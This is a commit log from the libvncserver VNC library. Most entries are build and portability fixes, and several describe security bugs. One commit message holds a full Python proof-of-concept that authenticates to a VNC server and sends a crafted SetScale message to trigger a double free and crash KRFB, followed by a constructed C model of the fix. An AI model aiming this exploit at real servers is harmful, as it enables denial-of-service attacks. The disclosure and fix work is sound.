| Commit message (Collapse) | Author | Age | Files | Lines |
| |
embedded with krfb
| |
Reported by Ken Johnson <[email protected]>.
The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero):

    if (msg.ssc.scale == 0) {
        rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero");
        rfbCloseClient(cl);
        return;
    }
    rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
    rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
    rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale);
    rfbSendNewScaleSize(cl); << This is the call that can trigger a free.
    return;

At the end of both cases there is a call to the rfbSendNewScaleSize function, which, if the connection is disconnected after the VNC scaling message is sent, can lead to a free occurring.

    else
    {
        rfbResizeFrameBufferMsg rmsg;
        rmsg.type = rfbResizeFrameBuffer;
        rmsg.pad1=0;
        rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width);
        rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height);
        rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height);
        if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) {
            rfbLogPerror("rfbNewClient: write");
            rfbCloseClient(cl);
            rfbClientConnectionGone(cl); << Call which may lead to a free.
            return FALSE;
        }
    }
    return TRUE;

Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data.
POC script to trigger the vulnerability:
---snip---
import socket,binascii,struct,sys
from time import sleep

class RFB:

    INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
    AUTH_NO_PASS = "\x01"
    AUTH_PASS = "\x02"
    SHARE_DESKTOP = "\x01"

    def AUTH_PROCESS(self,data,flag):
        if flag == 0:
            # Get security types
            secTypeCount = data[0]
            secType = {}
            for i in range(int(len(secTypeCount))):
                secType[i] = data[1]
            return secType
        elif flag == 1:
            # Get auth result
            # 0 means auth success
            # 1 means failure
            return data[3]

    def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD):
        try:
            from Crypto.Cipher import DES
        except:
            print "Error importing crypto. Please fix or do not require authentication"
            sys.exit(1)
        if len(PASSWORD) != 8:
            PASSWORD = PASSWORD.ljust(8, '\0')
        PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))]
        PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7]))
        crypto = DES.new(PASSWORD)
        return crypto.encrypt(data)

    def reverse_bits(self,x):
        a=0
        for i in range(8):
            a += ((x>>i)&1)<<(7-i)
        return a

def main(argv):
    print "Proof of Concept"
    print "Copyright TELUS Security Labs"
    print "All Rights Reserved.\n"
    try:
        HOST = sys.argv[1]
        PORT = int(sys.argv[2])
    except:
        print "Usage: python setscale_segv_poc.py <host> <port> [password]"
        sys.exit(1)
    try:
        PASSWORD = sys.argv[3]
    except:
        print "No password supplied"
        PASSWORD = ""
    vnc = RFB()
    remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remote.connect((HOST,PORT))
    # Get server version
    data = remote.recv(1024)
    # Send 3.8 version
    remote.send(vnc.INIT_3008)
    # Get supported security types
    data = remote.recv(1024)
    # Process Security Message
    secType = vnc.AUTH_PROCESS(data,0)
    if secType[0] == "\x02":
        # Send accept for password auth
        remote.send(vnc.AUTH_PASS)
        # Get challenge
        data = remote.recv(1024)
        # Send challenge response
        remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD))
    elif secType[0] == "\x01":
        # Send accept for None pass
        remote.send(vnc.AUTH_NO_PASS)
    else:
        print 'The server sent us something weird during auth.'
        sys.exit(1)
    # Get result
    data = remote.recv(1024)
    # Process result
    result = vnc.AUTH_PROCESS(data,1)
    if result == "\x01":
        # Authentication failure.
        data = remote.recv(1024)
        print 'Authentication failure. Server Reason: ' + str(data)
        sys.exit(1)
    elif result == "\x00":
        print "Authentication success."
    else:
        print 'Some other authentication issue occured.'
        sys.exit(1)
    # Send ClientInit
    remote.send(vnc.SHARE_DESKTOP)
    # Send malicious message
    print "Sending malicious data..."
    remote.send("\x08\x08\x00\x00")
    remote.close()

if __name__ == "__main__":
    main(sys.argv)
---snap---
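
The double teardown described in the commit message above, reduced to a constructed model (an added example, not code from libvncserver, krfb or the commit): a helper that both closes and tears down a client on a failed write, next to a form where the helper only closes and the connection's owner releases the client once. All names are hypothetical, and teardown is counted rather than performed so the model never executes a real double free.

```c
#include <stdio.h>

/* Constructed model; hypothetical names, not libvncserver/krfb code. */
typedef struct {
    int sock;       /* -1 once the connection is closed */
    int peer_gone;  /* 1 if the peer disconnected after its request */
    int teardowns;  /* times per-client teardown ran; must stay <= 1 */
} client;

/* Stand-in for a socket write: fails when the peer has gone away. */
static int write_exact(client *c, int len) { return c->peer_gone ? -1 : len; }
static void close_client(client *c) { c->sock = -1; }

/* Teardown stand-in: counts only, so no real double free happens. */
static void connection_gone(client *c) { c->teardowns++; }

/* Before: the helper closes AND tears down on a failed write. */
static int send_scale_size_before(client *c) {
    if (write_exact(c, 4) < 0) {
        close_client(c);
        connection_gone(c);   /* releases state the caller still owns */
        return 0;
    }
    return 1;
}

/* After: the helper only marks the client closed and reports failure. */
static int send_scale_size_after(client *c) {
    if (write_exact(c, 4) < 0) {
        close_client(c);
        return 0;
    }
    return 1;
}

/* Connection owner: tears down a closed client; returns teardown count. */
static int handle_message(int (*send_scale_size)(client *), int peer_gone) {
    client c = { 3, peer_gone, 0 };
    send_scale_size(&c);
    if (c.sock == -1)
        connection_gone(&c);
    return c.teardowns;
}

int main(void) {
    printf("before: %d\n", handle_message(send_scale_size_before, 1));
    printf("after:  %d\n", handle_message(send_scale_size_after, 1));
    return 0;
}
```

A teardown count of 2 in the "before" path corresponds to the second rfbClientConnectionGone call the commit message describes; a single owner for teardown keeps the count at 1.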
|
Operator "+" has a higher priority than "? :"
|
There was a possible buffer overflow in rfbFileTransferOffer message when
processing the FileTime.
Signed-off-by: Johannes Schindelin <[email protected]>
|
Autotools fix revisited.
|
Signed-off-by: Johannes Schindelin <[email protected]>
|
compilation
|
We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
|
Winsock 1 and 2.
|
The additional compat_mkdir function was not necessary at all.
|
instructions")
|
Basically taken from https://github.com/danielgindi/FileDir with some adjustments
|
macros on MSVC
|
Passing NULL to sprintf() would most likely crash the program.
|
functions are renamed or deprecated
For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
|
client->server messages. This would cause a division by zero and crash the server.
|
can send up to 2**32-1 bytes of text, and such a large allocation is likely to fail in case of high memory pressure. This would result in a server crash (write at address 0).
|
This allows for reinitializations of e. g. sockets in a SHUTDOWN state.
The only state that doesn't make sense to reinitialize are READY states.
|
Krfb crashes on quit, if any client is connected
due to a rfbClientConnectionGone call missing
|
Signed-off-by: Johannes Schindelin <[email protected]>
|
GCC < 4.6 failed to parse the declaration of ws_header_t correctly because
it did not accept anonymous structs and unions. [1]
Work around the bug by adding names to the unions and structs. Ugly, but
works.
[1] http://gcc.gnu.org/bugzilla/show_bug.cgi?id=4784
|
byteswap.h exists only on glibc, so building libvncserver with websockets
support was not possible in other systems.
Replace the inclusion of byteswap.h and the WS_* definitions with calls to
htobeNN, which should perform the same conversions, be more portable and
avoid the need to check for the platform's endianness.
|
The current definitions were mostly useful to glibc and followed its
feature_test_macros(3) documentation.
However, this means other platforms still had problems when building with
strict compilation flags. _BSD_SOURCE, for example, is only recognized by
glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the
removal of some definitions (such as the outdated _POSIX_SOURCE one).
_POSIX_SOURCE also had to be conditionally defined in some places, as what
it enables or disables during compilation varies across systems.
|
Building with -ansi failed due to some code (as well as system
headers) using non-C89 features. Fix that by adding the usual
_POSIX_SOURCE and _BSD_SOURCE definitions already present in some
other files.
|
Using C++-style comments when building the code with -ansi does not
work, so be more conservative with the comment style.
|
build_dir/rfb is not passed as an include directory automatically to
the compiler, so including that file fails.
|
As requested only those lines are indented that have been changed.
|
TightPNG replaces the ZLIB stuff in Tight encoding with PNG. It still
uses JPEG rects as well. Theoretically, we could build TightPNG with only
libpng and libjpeg - without zlib - but libpng depends on zlib, so this is
kinda moot.
|
This also fixes a compiler warning.
|
Conflicts, resolved manually:
AUTHORS
|